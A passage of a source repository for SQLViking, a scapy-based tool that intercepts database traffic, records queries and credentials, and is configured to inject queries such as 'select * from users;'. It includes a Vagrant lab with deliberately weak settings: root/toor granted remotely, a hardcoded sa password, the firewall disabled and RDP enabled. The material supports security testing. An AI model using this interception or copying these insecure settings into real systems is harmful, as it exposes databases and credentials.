and int(h,16)<127: 40 | return True 41 | return False 42 | 43 | def readable(self,data): 44 | a="" 45 | for i in range(0,len(data),2): 46 | if self.validAscii(data[i:i+2]): 47 | a+=data[i:i+2].decode('hex') 48 | return a 49 | 50 | class Response(): 51 | def __init__(self, data): 52 | self.data = data 53 | self.messages = [] 54 | self.results = [] 55 | self.tdssock = tds._TdsSocket(self.data) 56 | 57 | def parse(self): 58 | try: 59 | while True: 60 | self.tdssock._main_session.find_result_or_done() 61 | except: 62 | pass 63 | 64 | try: 65 | self.messages = self.tdssock._main_session.messages 66 | except: 67 | pass 68 | 69 | self.results = self.tdssock._main_session.results 70 | 71 | class Request(): 72 | def __init__(self): 73 | self.tdssock = tds._TdsSocket() 74 | 75 | def buildRequest(self,query): 76 | self.tdssock._main_session.submit_plain_query(query) 77 | return binascii.hexlify(self.tdssock._main_session._writer.data).decode('hex') -------------------------------------------------------------------------------- /demo/Vagrantfile: -------------------------------------------------------------------------------- 1 | # -*- mode: ruby -*- 2 | # vi: set ft=ruby : 3 | 4 | # Vagrantfile API/syntax version. Don't touch unless you know what you're doing! 5 | VAGRANTFILE_API_VERSION = "2" 6 | 7 | ENV['VAGRANT_DEFAULT_PROVIDER'] = 'virtualbox' 8 | 9 | if ! File.exists?('./NDP451-KB2858728-x86-x64-AllOS-ENU.exe') 10 | puts '.Net 4.5 installer could not be found!' 11 | puts "Please run:\n wget http://download.microsoft.com/download/1/6/7/167F0D79-9317-48AE-AEDB-17120579F8E2/NDP451-KB2858728-x86-x64-AllOS-ENU.exe" 12 | exit 1 13 | end 14 | 15 | if ! File.exists?('./SQLEXPRWT_x64_ENU.exe') 16 | puts 'SQL Server installer could not be found!' 17 | puts "Please run:\n wget http://download.microsoft.com/download/0/4/B/04BE03CD-EAF3-4797-9D8D-2E08E316C998/SQLEXPRWT_x64_ENU.exe" 18 | exit 1 19 | end 20 | 21 | Vagrant.configure(VAGRANTFILE_API_VERSION) do |config| 22 | 23 | ##########Setup Vulnerable Test App ########### 24 | 25 | config.vm.define :weakapp do |app| 26 | app.vm.box = "phusion/ubuntu-14.04-amd64" 27 | 28 | app.vm.provider "virtualbox" do |v| 29 | #v.gui = true 30 | v.name = "(SQLVIKING) Comment Application" 31 | end 32 | 33 | app.vm.network "private_network", ip: "192.168.123.10" 34 | app.vm.network :forwarded_port, guest:4567, host:4567 35 | app.vm.provision "shell", path: "vagrant-scripts/prepare-weakapp.sh" 36 | app.vm.provision "shell", path: "vagrant-scripts/setup-weakapp.sh" 37 | end 38 | 39 | ########## Setup MSSQL Server ########### 40 | 41 | config.vm.define :mssql do |sql| 42 | sql.vm.box = "ferventcoder/win2008r2-x64-nocm" 43 | sql.vm.guest = :windows 44 | sql.vm.provider "virtualbox" do |v| 45 | #v.gui = true 46 | v.name = "(SQLVIKING) Microsoft SQL Server" 47 | end 48 | 49 | sql.vm.communicator = "winrm" 50 | sql.vm.network "private_network", ip: "192.168.123.11" 51 | sql.vm.network "forwarded_port", guest: 3389, host: 3389 52 | sql.vm.network "forwarded_port", guest: 1433, host: 1433 53 | 54 | sql.vm.provision :shell, path: "vagrant-scripts/install-dot-net.ps1" 55 | sql.vm.provision :shell, path: "vagrant-scripts/install-sql-server.cmd" 56 | sql.vm.provision :shell, path: "vagrant-scripts/configure-sql-port.ps1" 57 | sql.vm.provision :shell, path: "vagrant-scripts/enable-rdp.ps1" 58 | 59 | end 60 | 61 | ########## Setup MySQL ############### 62 | config.vm.define :mysql do |mysql| 63 | mysql.vm.box = "phusion/ubuntu-14.04-amd64" 64 | 65 | mysql.vm.provider "virtualbox" do |v| 66 | #v.gui = true 67 | v.name = "(SQLVIKING) MySQL Server" 68 | end 69 | 70 | mysql.vm.network "private_network", ip: "192.168.123.13" 71 | mysql.vm.network :forwarded_port, guest: 3306, host: 3306 72 | mysql.vm.provision "shell", path: "vagrant-scripts/setup-mysql.sh" 73 | 74 | end 75 | 76 | ########## Setup SQLViking ########### 77 | 78 | config.vm.define :sqlviking do |viking| 79 | viking.vm.box = "phusion/ubuntu-14.04-amd64" 80 | 81 | viking.vm.provider "virtualbox" do |v| 82 | #v.gui = true 83 | v.name = "(SQLVIKING) SQLViking" 84 | v.customize ["modifyvm", :id, "--nicpromisc1", "allow-all"] 85 | v.customize ["modifyvm", :id, "--nicpromisc2", "allow-all"] 86 | end 87 | 88 | viking.vm.network "private_network", ip: "192.168.123.12" 89 | viking.vm.provision "shell", path: "vagrant-scripts/setup-sqlviking.sh" 90 | 91 | end 92 | end -------------------------------------------------------------------------------- /demo/db/create.sql: -------------------------------------------------------------------------------- 1 | USE [master] 2 | GO 3 | 4 | /****** Object: Database [test] Script Date: 10/30/2014 3:54:00 PM ******/ 5 | CREATE DATABASE [test] 6 | GO 7 | ALTER DATABASE test MODIFY FILE 8 | ( NAME = N'test' , SIZE = 4096KB , MAXSIZE = UNLIMITED, FILEGROWTH = 1024KB ) 9 | GO 10 | ALTER DATABASE test MODIFY FILE 11 | ( NAME = N'test_log' , SIZE = 1024KB , MAXSIZE = 2048GB , FILEGROWTH = 10%) 12 | GO 13 | 14 | ALTER DATABASE [test] SET COMPATIBILITY_LEVEL = 100 15 | GO 16 | 17 | IF (1 = FULLTEXTSERVICEPROPERTY('IsFullTextInstalled')) 18 | begin 19 | EXEC [test].[dbo].[sp_fulltext_database] @action = 'enable' 20 | end 21 | GO 22 | 23 | ALTER DATABASE [test] SET ANSI_NULL_DEFAULT OFF 24 | GO 25 | 26 | ALTER DATABASE [test] SET ANSI_NULLS OFF 27 | GO 28 | 29 | ALTER DATABASE [test] SET ANSI_PADDING OFF 30 | GO 31 | 32 | ALTER DATABASE [test] SET ANSI_WARNINGS OFF 33 | GO 34 | 35 | ALTER DATABASE [test] SET ARITHABORT OFF 36 | GO 37 | 38 | ALTER DATABASE [test] SET AUTO_CLOSE OFF 39 | GO 40 | 41 | ALTER DATABASE [test] SET AUTO_CREATE_STATISTICS ON 42 | GO 43 | 44 | ALTER DATABASE [test] SET AUTO_SHRINK OFF 45 | GO 46 | 47 | ALTER DATABASE [test] SET AUTO_UPDATE_STATISTICS ON 48 | GO 49 | 50 | ALTER DATABASE [test] SET CURSOR_CLOSE_ON_COMMIT OFF 51 | GO 52 | 53 | ALTER DATABASE [test] SET CURSOR_DEFAULT GLOBAL 54 | GO 55 | 56 | ALTER DATABASE [test] SET CONCAT_NULL_YIELDS_NULL OFF 57 | GO 58 | 59 | ALTER DATABASE [test] SET NUMERIC_ROUNDABORT OFF 60 | GO 61 | 62 | ALTER DATABASE [test] SET QUOTED_IDENTIFIER OFF 63 | GO 64 | 65 | ALTER DATABASE [test] SET RECURSIVE_TRIGGERS OFF 66 | GO 67 | 68 | ALTER DATABASE [test] SET DISABLE_BROKER 69 | GO 70 | 71 | ALTER DATABASE [test] SET AUTO_UPDATE_STATISTICS_ASYNC OFF 72 | GO 73 | 74 | ALTER DATABASE [test] SET DATE_CORRELATION_OPTIMIZATION OFF 75 | GO 76 | 77 | ALTER DATABASE [test] SET TRUSTWORTHY OFF 78 | GO 79 | 80 | ALTER DATABASE [test] SET ALLOW_SNAPSHOT_ISOLATION OFF 81 | GO 82 | 83 | ALTER DATABASE [test] SET PARAMETERIZATION SIMPLE 84 | GO 85 | 86 | ALTER DATABASE [test] SET READ_COMMITTED_SNAPSHOT OFF 87 | GO 88 | 89 | ALTER DATABASE [test] SET HONOR_BROKER_PRIORITY OFF 90 | GO 91 | 92 | ALTER DATABASE [test] SET RECOVERY FULL 93 | GO 94 | 95 | ALTER DATABASE [test] SET MULTI_USER 96 | GO 97 | 98 | ALTER DATABASE [test] SET PAGE_VERIFY CHECKSUM 99 | GO 100 | 101 | ALTER DATABASE [test] SET DB_CHAINING OFF 102 | GO 103 | 104 | ALTER DATABASE [test] SET READ_WRITE 105 | GO 106 | 107 | CREATE LOGIN test 108 | WITH PASSWORD = 'abcABC123!', 109 | CHECK_POLICY = ON; 110 | GO 111 | 112 | USE [test] 113 | GO 114 | 115 | -- Creates a database user for the login created above. 116 | CREATE USER test FOR LOGIN test; 117 | GO 118 | 119 | EXEC sp_addrolemember N'db_owner', N'test' -------------------------------------------------------------------------------- /demo/sinatra-app/.rvmrc: -------------------------------------------------------------------------------- 1 | rvm use 2.0.0 2 | -------------------------------------------------------------------------------- /demo/sinatra-app/Gemfile: -------------------------------------------------------------------------------- 1 | source "https://rubygems.org" 2 | 3 | gem 'sinatra-activerecord' 4 | gem 'tiny_tds' 5 | gem 'mysql2' 6 | gem 'activerecord-sqlserver-adapter' 7 | gem 'rake' 8 | gem 'sidekiq' 9 | -------------------------------------------------------------------------------- /demo/sinatra-app/Gemfile.lock: -------------------------------------------------------------------------------- 1 | GEM 2 | remote: https://rubygems.org/ 3 | specs: 4 | activemodel (4.1.5) 5 | activesupport (= 4.1.5) 6 | builder (~> 3.1) 7 | activerecord (4.1.5) 8 | activemodel (= 4.1.5) 9 | activesupport (= 4.1.5) 10 | arel (~> 5.0.0) 11 | activerecord-sqlserver-adapter (4.1.0) 12 | activerecord (~> 4.1.0) 13 | arel 14 | activesupport (4.1.5) 15 | i18n (~> 0.6, >= 0.6.9) 16 | json (~> 1.7, >= 1.7.7) 17 | minitest (~> 5.1) 18 | thread_safe (~> 0.1) 19 | tzinfo (~> 1.1) 20 | arel (5.0.1.20140414130214) 21 | builder (3.2.2) 22 | celluloid (0.16.0) 23 | timers (~> 4.0.0) 24 | connection_pool (2.1.1) 25 | hitimes (1.2.2) 26 | i18n (0.6.11) 27 | json (1.8.1) 28 | minitest (5.4.1) 29 | mysql2 (0.3.17) 30 | rack (1.5.2) 31 | rack-protection (1.5.3) 32 | rack 33 | rake (10.3.2) 34 | redis (3.2.0) 35 | redis-namespace (1.5.1) 36 | redis (~> 3.0, >= 3.0.4) 37 | sidekiq (3.3.0) 38 | celluloid (>= 0.16.0) 39 | connection_pool (>= 2.0.0) 40 | json 41 | redis (>= 3.0.6) 42 | redis-namespace (>= 1.3.1) 43 | sinatra (1.4.5) 44 | rack (~> 1.4) 45 | rack-protection (~> 1.4) 46 | tilt (~> 1.3, >= 1.3.4) 47 | sinatra-activerecord (2.0.2) 48 | activerecord (>= 3.2) 49 | sinatra (~> 1.0) 50 | thread_safe (0.3.4) 51 | tilt (1.4.1) 52 | timers (4.0.1) 53 | hitimes 54 | tiny_tds (0.6.2) 55 | tzinfo (1.2.2) 56 | thread_safe (~> 0.1) 57 | 58 | PLATFORMS 59 | ruby 60 | 61 | DEPENDENCIES 62 | activerecord-sqlserver-adapter 63 | mysql2 64 | rake 65 | sidekiq 66 | sinatra-activerecord 67 | tiny_tds 68 | -------------------------------------------------------------------------------- /demo/sinatra-app/Rakefile: -------------------------------------------------------------------------------- 1 | # Rakefile 2 | require "./app" 3 | require "sinatra/activerecord/rake" 4 | -------------------------------------------------------------------------------- /demo/sinatra-app/app.rb: -------------------------------------------------------------------------------- 1 | require 'sidekiq' 2 | require 'sinatra' 3 | require 'sinatra/base' 4 | require "sinatra/activerecord" 5 | 6 | # Server/DB setup # 7 | set :database_file, "./database_mysql.yml" 8 | set :bind, '0.0.0.0' 9 | set :daemon, true 10 | 11 | # Active Record Initialization # 12 | 13 | class Comment < ActiveRecord::Base 14 | end 15 | 16 | class User < ActiveRecord::Base 17 | end 18 | 19 | class Account < ActiveRecord::Base 20 | end 21 | 22 | class UserMimic 23 | include Sidekiq::Worker 24 | def perform() 25 | puts User.all 26 | sleep(5.seconds) 27 | puts Comment.all 28 | sleep(5.seconds) 29 | puts Account.all 30 | sleep(5.seconds) 31 | User.find(1) 32 | sleep(5.seconds) 33 | user = User.find_by(name: "Ken") 34 | puts user 35 | puts Comment.first 36 | sleep(5.seconds) 37 | puts Account.first 38 | sleep(5.seconds) 39 | Comment.create(name: "Go Team", message: "Win Win") 40 | end 41 | end 42 | # Sidekiq to Mimic Users # 43 | 44 | class WeakApp < Sinatra::Base 45 | # Routing # 46 | get '/' do 47 | @comments = Comment.all 48 | erb :index 49 | end 50 | 51 | post '/' do 52 | Comment.create!( 53 | name: params[:name], 54 | message: params[:message] 55 | ) 56 | redirect '/' 57 | end 58 | 59 | # App with User mimic function running # 60 | 61 | get '/usermimic' do 62 | @comments = Comment.all 63 | UserMimic.perform_async() 64 | erb :index 65 | end 66 | end 67 | -------------------------------------------------------------------------------- /demo/sinatra-app/config.ru: -------------------------------------------------------------------------------- 1 | require './app' 2 | run WeakApp -------------------------------------------------------------------------------- /demo/sinatra-app/database_mysql.yml: -------------------------------------------------------------------------------- 1 | ##development: 2 | ##adapter: sqlserver 3 | ##database: test-app 4 | ##host: localhost 5 | ##username: sa 6 | ##password: '#SAPassword!' 7 | ##pool: 15 8 | ##timeout: 5000 9 | 10 | development: 11 | adapter: mysql2 12 | database: weakapp 13 | host: 192.168.123.13 14 | port: 3306 15 | username: root 16 | password: toor 17 | pool: 15 18 | timeout: 5000 19 | 20 | production: 21 | adapter: mysql2 22 | database: weakapp 23 | host: 192.168.123.13 24 | port: 3306 25 | username: root 26 | password: toor 27 | pool: 15 28 | timeout: 5000 29 | -------------------------------------------------------------------------------- /demo/sinatra-app/db/migrate/20140913010102_create_comments.rb: -------------------------------------------------------------------------------- 1 | class CreateComments < ActiveRecord::Migration 2 | def change 3 | create_table :comments do |t| 4 | t.string :name 5 | t.text :message 6 | end 7 | 8 | create_table :users do |t| 9 | t.string :name 10 | t.string :email 11 | t.string :gender 12 | t.string :password 13 | t.string :password_confirmation 14 | end 15 | 16 | create_table :accounts do |t| 17 | t.string :name 18 | t.decimal :balance 19 | t.string :status 20 | t.text :notes 21 | end 22 | end 23 | end 24 | -------------------------------------------------------------------------------- /demo/sinatra-app/db/schema.rb: -------------------------------------------------------------------------------- 1 | # encoding: UTF-8 2 | # This file is auto-generated from the current state of the database. Instead 3 | # of editing this file, please use the migrations feature of Active Record to 4 | # incrementally modify your database, and then regenerate this schema definition. 5 | # 6 | # Note that this schema.rb definition is the authoritative source for your 7 | # database schema. If you need to create the application database on another 8 | # system, you should be using db:schema:load, not running all the migrations 9 | # from scratch. The latter is a flawed and unsustainable approach (the more migrations 10 | # you'll amass, the slower it'll run and the greater likelihood for issues). 11 | # 12 | # It's strongly recommended that you check this file into your version control system. 13 | 14 | ActiveRecord::Schema.define(version: 20140913010102) do 15 | 16 | create_table "accounts", force: true do |t| 17 | t.string "name" 18 | t.decimal "balance", precision: 10, scale: 0 19 | t.string "status" 20 | t.text "notes" 21 | end 22 | 23 | create_table "comments", force: true do |t| 24 | t.string "name" 25 | t.text "message" 26 | end 27 | 28 | create_table "users", force: true do |t| 29 | t.string "name" 30 | t.string "email" 31 | t.string "gender" 32 | t.string "password" 33 | t.string "password_confirmation" 34 | end 35 | 36 | end 37 | -------------------------------------------------------------------------------- /demo/sinatra-app/db/seeds.rb: -------------------------------------------------------------------------------- 1 | user_list = [ 2 | ["Ken","ken@ken.com","male","P@44word","P@44word"], 3 | ["Bob","bob@bob.com","male","P@44word123","P@44word123"], 4 | ["Jonn","jonn@aero.net","male","Flapper","Flapper"], 5 | ["Amy","amy@amy.net","female","amyrulez","amyrulez"], 6 | ["Josh","josh@google.com","male","maria","maria"], 7 | ["Pat","pat@b2lef.com","male","apples","apples"], 8 | ["Penny","penny@penny.net","female","nowords","nowords"], 9 | ["Art","art@monk.com","male","redskins","redskins"] 10 | ] 11 | 12 | account_list = [ 13 | ["Primary",103021,"Good","In Good standing"], 14 | ["Checking",22349,"Good","Getting there"], 15 | ["Credit",-3041,"Negative","Need to pay this off"], 16 | ["Savings",100,"Neutral","Running Low"] 17 | ] 18 | 19 | comment_list = [ 20 | ["Go Team","Doing very well guys"] 21 | ] 22 | 23 | user_list.each do |name, email, gender, password, password_confirmation| 24 | User.create( name: name, email: email, gender: gender, password: password, password_confirmation: password_confirmation) 25 | end 26 | 27 | account_list.each do |name, balance, status, notes| 28 | Account.create(name: name, balance: balance, status: status, notes: notes ) 29 | end 30 | 31 | comment_list.each do |name, message| 32 | Comment.create(name: name, message: message) 33 | end -------------------------------------------------------------------------------- /demo/sinatra-app/views/index.erb: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | SQLViking Comments! 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 19 | 20 | 29 | 30 | 31 |
32 |
33 |

SQLViking Comments

34 |

This app can be used to generate requests to the database so that SQLViking can read them

35 |
36 |
37 |
38 |
39 |
40 | 41 | 42 |
43 |
44 | 45 | 46 |
47 | 48 |
49 |
50 |
51 | <% if @comments.any? %> 52 |

Comments

53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | <% @comments.each do |comment| %> 62 | 63 | 64 | 65 | 66 | <% end %> 67 | 68 | <% else %> 69 |

No comments found!

70 | <% end %> 71 | 72 | 73 | 74 | 75 | 76 | -------------------------------------------------------------------------------- /demo/vagrant-scripts/config/my.cnf: -------------------------------------------------------------------------------- 1 | # 2 | # The MySQL database server configuration file for weakapp. This 3 | # config simply comments the bind address to allow remote connections 4 | # 5 | # You can copy this to one of: 6 | # - "/etc/mysql/my.cnf" to set global options, 7 | # - "~/.my.cnf" to set user-specific options. 8 | # 9 | # One can use all long options that the program supports. 10 | # Run program with --help to get a list of available options and with 11 | # --print-defaults to see which it would actually understand and use. 12 | # 13 | # For explanations see 14 | # http://dev.mysql.com/doc/mysql/en/server-system-variables.html 15 | 16 | # This will be passed to all mysql clients 17 | # It has been reported that passwords should be enclosed with ticks/quotes 18 | # escpecially if they contain "#" chars... 19 | # Remember to edit /etc/mysql/debian.cnf when changing the socket location. 20 | [client] 21 | port = 3306 22 | socket = /var/run/mysqld/mysqld.sock 23 | 24 | # Here is entries for some specific programs 25 | # The following values assume you have at least 32M ram 26 | 27 | # This was formally known as [safe_mysqld]. Both versions are currently parsed. 28 | [mysqld_safe] 29 | socket = /var/run/mysqld/mysqld.sock 30 | nice = 0 31 | 32 | [mysqld] 33 | # 34 | # * Basic Settings 35 | # 36 | user = mysql 37 | pid-file = /var/run/mysqld/mysqld.pid 38 | socket = /var/run/mysqld/mysqld.sock 39 | port = 3306 40 | basedir = /usr 41 | datadir = /var/lib/mysql 42 | tmpdir = /tmp 43 | lc-messages-dir = /usr/share/mysql 44 | skip-external-locking 45 | # 46 | # Instead of skip-networking the default is now to listen only on 47 | # localhost which is more compatible and is not less secure. 48 | # bind-address = 127.0.0.1 49 | # 50 | # * Fine Tuning 51 | # 52 | key_buffer = 16M 53 | max_allowed_packet = 16M 54 | thread_stack = 192K 55 | thread_cache_size = 8 56 | # This replaces the startup script and checks MyISAM tables if needed 57 | # the first time they are touched 58 | myisam-recover = BACKUP 59 | #max_connections = 100 60 | #table_cache = 64 61 | #thread_concurrency = 10 62 | # 63 | # * Query Cache Configuration 64 | # 65 | query_cache_limit = 1M 66 | query_cache_size = 16M 67 | # 68 | # * Logging and Replication 69 | # 70 | # Both location gets rotated by the cronjob. 71 | # Be aware that this log type is a performance killer. 72 | # As of 5.1 you can enable the log at runtime! 73 | #general_log_file = /var/log/mysql/mysql.log 74 | #general_log = 1 75 | # 76 | # Error log - should be very few entries. 77 | # 78 | log_error = /var/log/mysql/error.log 79 | # 80 | # Here you can see queries with especially long duration 81 | #log_slow_queries = /var/log/mysql/mysql-slow.log 82 | #long_query_time = 2 83 | #log-queries-not-using-indexes 84 | # 85 | # The following can be used as easy to replay backup logs or for replication. 86 | # note: if you are setting up a replication slave, see README.Debian about 87 | # other settings you may need to change. 88 | #server-id = 1 89 | #log_bin = /var/log/mysql/mysql-bin.log 90 | expire_logs_days = 10 91 | max_binlog_size = 100M 92 | #binlog_do_db = include_database_name 93 | #binlog_ignore_db = include_database_name 94 | # 95 | # * InnoDB 96 | # 97 | # InnoDB is enabled by default with a 10MB datafile in /var/lib/mysql/. 98 | # Read the manual for more InnoDB related options. There are many! 99 | # 100 | # * Security Features 101 | # 102 | # Read the manual, too, if you want chroot! 103 | # chroot = /var/lib/mysql/ 104 | # 105 | # For generating SSL certificates I recommend the OpenSSL GUI "tinyca". 106 | # 107 | # ssl-ca=/etc/mysql/cacert.pem 108 | # ssl-cert=/etc/mysql/server-cert.pem 109 | # ssl-key=/etc/mysql/server-key.pem 110 | 111 | 112 | 113 | [mysqldump] 114 | quick 115 | quote-names 116 | max_allowed_packet = 16M 117 | 118 | [mysql] 119 | #no-auto-rehash # faster start of mysql but no tab completition 120 | 121 | [isamchk] 122 | key_buffer = 16M 123 | 124 | # 125 | # * IMPORTANT: Additional settings that can override those from this file! 126 | # The files must end with '.cnf', otherwise they'll be ignored. 127 | # 128 | !includedir /etc/mysql/conf.d/ -------------------------------------------------------------------------------- /demo/vagrant-scripts/configure-sql-port.ps1: -------------------------------------------------------------------------------- 1 | # http://stackoverflow.com/a/9949105 2 | $ErrorActionPreference = "Stop" 3 | 4 | echo "Configuring TCP port" 5 | 6 | # http://technet.microsoft.com/en-us/library/dd206997(v=sql.105).aspx 7 | # Load assemblies 8 | [reflection.assembly]::LoadWithPartialName("Microsoft.SqlServer.Smo") 9 | [reflection.assembly]::LoadWithPartialName("Microsoft.SqlServer.SqlWmiManagement") 10 | 11 | # http://www.dbi-services.com/index.php/blog/entry/sql-server-2012-configuring-your-tcp-port-via-powershell 12 | # Set the port 13 | $smo = 'Microsoft.SqlServer.Management.Smo.' 14 | $wmi = new-object ($smo + 'Wmi.ManagedComputer') 15 | $uri = "ManagedComputer[@Name='WIN-2008R2-STD']/ ServerInstance[@Name='SQLEXPRESS']/ServerProtocol[@Name='Tcp']" 16 | $Tcp = $wmi.GetSmoObject($uri) 17 | $wmi.GetSmoObject($uri + "/IPAddress[@Name='IPAll']").IPAddressProperties[1].Value="1433" 18 | $Tcp.alter() 19 | 20 | echo "DONE!" 21 | 22 | echo "Restarting service..." 23 | # Restart service so that configurations are applied 24 | restart-service -f "SQL Server (SQLEXPRESS)" 25 | echo "DONE!" 26 | -------------------------------------------------------------------------------- /demo/vagrant-scripts/enable-rdp.ps1: -------------------------------------------------------------------------------- 1 | # http://stackoverflow.com/a/9949105 2 | $ErrorActionPreference = "Stop" 3 | 4 | # http://networkerslog.blogspot.com.br/2013/09/how-to-enable-remote-desktop-remotely.html 5 | set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0 6 | -------------------------------------------------------------------------------- /demo/vagrant-scripts/install-dot-net.ps1: -------------------------------------------------------------------------------- 1 | # http://stackoverflow.com/a/9949105 2 | $ErrorActionPreference = "Stop" 3 | 4 | import-module servermanager 5 | echo "Installing .NET Framework" 6 | add-windowsfeature as-net-framework 7 | -------------------------------------------------------------------------------- /demo/vagrant-scripts/install-sql-server.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | echo Installing SQL Server 2008 Express R2, it will take a while... 4 | C:\vagrant\SQLEXPRWT_x64_ENU.exe /Q /Action=install /INDICATEPROGRESS /INSTANCENAME="SQLEXPRESS" /INSTANCEID="SQLExpress" /IAcceptSQLServerLicenseTerms /FEATURES=SQL,Tools /TCPENABLED=1 /SECURITYMODE="SQL" /SAPWD="#SAPassword!" 5 | echo Done! 6 | 7 | echo Disabling firewall 8 | netsh advfirewall set allprofiles state off 9 | -------------------------------------------------------------------------------- /demo/vagrant-scripts/prepare-weakapp.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | sudo apt-get install git -y 4 | sudo apt-get install unzip -y 5 | 6 | gpg --keyserver hkp://keys.gnupg.net --recv-keys D39DC0E3 7 | \curl -sSL https://get.rvm.io | bash -s stable --ruby=2.0.0 8 | source /home/vagrant/.rvm/scripts/rvm 9 | source /usr/local/rvm/scripts/rvm 10 | 11 | #Grab Dependencies 12 | sudo apt-get install freetds-dev freetds-bin tdsodbc libmysqlclient-dev redis-server -y -------------------------------------------------------------------------------- /demo/vagrant-scripts/setup-mysql.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | sudo apt-get install git -y 4 | sudo apt-get install unzip -y 5 | sudo apt-get install debconf-utils -y 6 | echo "mysql-server-5.5 mysql-server/root_password password toor" | sudo debconf-set-selections 7 | echo "mysql-server-5.5 mysql-server/root_password_again password toor" | sudo debconf-set-selections 8 | sudo apt-get install mysql-server-5.5 -y 9 | cp -f /vagrant/vagrant-scripts/config/my.cnf /etc/mysql/my.cnf 10 | mysql -u root --password=toor -e "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'toor'" 11 | sudo service mysql restart 12 | mkdir /opt/sql/ 13 | cp -R /vagrant/* /opt/sql/ 14 | 15 | -------------------------------------------------------------------------------- /demo/vagrant-scripts/setup-sqlviking.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | sudo apt-get install git -y 4 | sudo apt-get install unzip -y 5 | 6 | mkdir /opt/sqlviking 7 | cp -R /vagrant/* /opt/sqlviking/ 8 | 9 | cd /tmp 10 | wget http://www.secdev.org/projects/scapy/files/scapy-2.3.0.zip 11 | unzip scapy-2.3.0.zip 12 | rm -rf scapy-2.3.0.zip 13 | cd scapy-2.* 14 | 15 | sudo chown -R vagrant:root /opt/sqlviking/ 16 | sudo python setup.py install 17 | 18 | cd /opt/sqlviking 19 | 20 | -------------------------------------------------------------------------------- /demo/vagrant-scripts/setup-weakapp.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | mkdir /opt/weakapp 4 | cp -R /vagrant/sinatra-app/* /opt/weakapp 5 | 6 | #Start Redis Server 7 | redis-server & 8 | 9 | cd /opt/weakapp 10 | rvm use 2.0.0 11 | bundle install 12 | bundle exec sidekiq -r ./app.rb & 13 | rake db:create 14 | rake db:migrate 15 | rake db:seed 16 | rackup -p 4567 -------------------------------------------------------------------------------- /sqlviking.conf: -------------------------------------------------------------------------------- 1 | [Databases] 2 | #type:ip:port 3 | MYSQL:192.168.1.9:3306 4 | 5 | [Injection] 6 | #ip:port:query/attack 7 | #192.168.168.128:3306:select * from users; 8 | #192.168.1.1:3306:0 9 | 10 | [Data] 11 | logToFile = True 12 | interval = 60 13 | fileName = log.txt 14 | #human, json 15 | format = json 16 | 17 | [Misc] 18 | fingerprint = False 19 | interface = en0 20 | debug = True 21 | -------------------------------------------------------------------------------- /sqlviking.py: -------------------------------------------------------------------------------- 1 | from os import walk 2 | from operator import itemgetter 3 | from scapy.all import * 4 | from copy import deepcopy 5 | from json import dumps 6 | import sys, getopt, re, argparse, threading, datetime, signal, Queue 7 | sys.path.append("databases/") 8 | from constantvalues import * 9 | #import constantvalues 10 | import mysql,sqlserver,Queue 11 | 12 | dbQueue1 = Queue.Queue() 13 | dbQueue2 = Queue.Queue() 14 | injectionQueue = Queue.Queue() 15 | pktQueue = Queue.Queue() 16 | 17 | settings = {} 18 | DATABASELIST = {'MYSQL':mysql.MySqlDB(), 'SQLSERV':sqlserver.SqlServerDB()} 19 | 20 | class Conn(): 21 | def __init__(self,cip,cport,sip,sport,state,db,nextcseq=-1,nextsseq=-1): 22 | self.cip = cip # client ip 23 | self.cport = cport 24 | self.sip = sip # server ip 25 | self.sport = sport 26 | self.db = db 27 | self.frag = [] 28 | self.state = state 29 | self.nextcseq = nextcseq 30 | self.nextsseq = nextsseq 31 | self.currentUser = '' 32 | self.currentInstance = '' 33 | 34 | def storeTraffic(self,data,pktType): 35 | if pktType==RESPONSE and len(self.db.traffic) > 0 and self.db.traffic[-1].result == None: #is result 36 | self.db.traffic[-1].result = data 37 | elif pktType==RESPONSE: #is result, missed query 38 | self.db.traffic.append(Traffic(result=data)) 39 | else: #is query 40 | self.db.traffic.append(Traffic(query=data)) 41 | 42 | def setInstance(self,instName): 43 | if instName not in self.db.instances: 44 | self.db.instances[instName] = Instance(instName) 45 | self.currentInstance = self.db.instances[instName] 46 | 47 | def foundTable(self,tableName): 48 | self.currentInstance.addTable(tableName) 49 | 50 | def foundCol(self,tableName,colName): 51 | self.db.currentInstance.addColumn(tableName,colName) 52 | 53 | def foundUser(self,user): 54 | self.db.addCredentials(user=user) 55 | 56 | def foundPassword(self,user,pw,salt='',scheme=''): 57 | self.db.addCredentials(user,pw,salt,scheme) 58 | 59 | class Database(): 60 | def __init__(self,dbType,ip,port): 61 | self.ip = ip 62 | self.port = port 63 | self.dbType = dbType 64 | self.traffic = [] 65 | self.credentials = {} # {'username':['pw','salt','scheme']} 66 | self.instances = {} 67 | 68 | def addCredentials(self,user,pw='',salt='',scheme=''): 69 | if user not in self.credentials: 70 | self.credentials[user] = [pw,salt,scheme] 71 | 72 | def getTraffic(self): 73 | data = { 74 | 'type' : None, 75 | 'ip' : None, 76 | 'port' : None, 77 | 'credentials' : [], 78 | 'instances' : [], 79 | 'traffic' : [] 80 | } 81 | traffic = { 82 | 'timestamp' : None, 83 | 'request' : None, 84 | 'response' : None 85 | } 86 | 87 | data['type'] = self.dbType 88 | data['ip'] = self.ip 89 | data['port'] = self.port 90 | data['credentials'] = self.credentials 91 | data['instances'] = deepcopy(self.instances) 92 | data['traffic'] = deepcopy(self.traffic) 93 | 94 | return data 95 | 96 | class Instance(): 97 | def __init__(self,name,tables={}): 98 | self.name = name 99 | self.tables = {} 100 | 101 | def addTable(self,tableName): 102 | if tableName not in self.tables: 103 | self.tables[tableName] = Table(tableName) 104 | 105 | def addColumn(self,tableName,colName): 106 | self.tables[tableName].addColumn(colName) 107 | 108 | class Table(): 109 | def __init__(self,name,cols=[]): 110 | self.name = name 111 | self.columns = cols 112 | 113 | def addColumn(self,colName): 114 | if colName not in self.columnss: 115 | self.columns.append(colName) 116 | 117 | class Traffic(): 118 | def __init__(self,query=None,result=None,instance=None): 119 | self.query = query 120 | self.result = result 121 | self.timestamp = datetime.datetime.now() 122 | self.instance = instance 123 | 124 | class 